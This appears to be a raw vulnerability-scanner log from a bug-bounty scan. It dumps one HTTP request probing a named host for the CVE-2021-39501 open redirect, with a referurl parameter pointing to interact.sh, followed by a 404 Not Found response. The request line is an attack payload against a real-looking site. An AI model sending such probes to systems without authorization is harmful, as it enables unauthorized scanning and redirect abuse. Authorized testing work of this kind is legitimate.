[CVE-2021-39501] Dumped HTTP request for https://techsolutions.bitpanda.com/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh


GET /index.php?m=user&c=Users&a=logout&referurl=https://interact.sh HTTP/1.1
Host: techsolutions.bitpanda.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[CVE-2021-39501] Dumped HTTP response https://techsolutions.bitpanda.com/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 9
Cache-Control: max-age=30
Content-Type: text/plain
Date: Tue, 05 Aug 2025 12:53:23 GMT
Strict-Transport-Security: max-age=31536000
Via: 1.1 46ac2c9f87eca5473c2cb27cfe0168a4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: JRnFzHrfppAdor9CyVAhAXvWyoPgpUrIYKn6VFFgMq80dcPQiHdERg==
X-Amz-Cf-Pop: IAD55-P8
X-Amz-Id-2: qw6a3ODbiLH7Qg7HxfoOm4Y3+xgcx5ExHBHA06YqN1HNN+i8wa7FGpld5on0BdB6Hh9tlfywq9ITYeh/VQGO1ODZGpIy3eV1NbWV9KNhdbo=
X-Amz-Request-Id: 41Z8TNDYXN3B8GB8
X-Cache: Error from cloudfront

Not Found
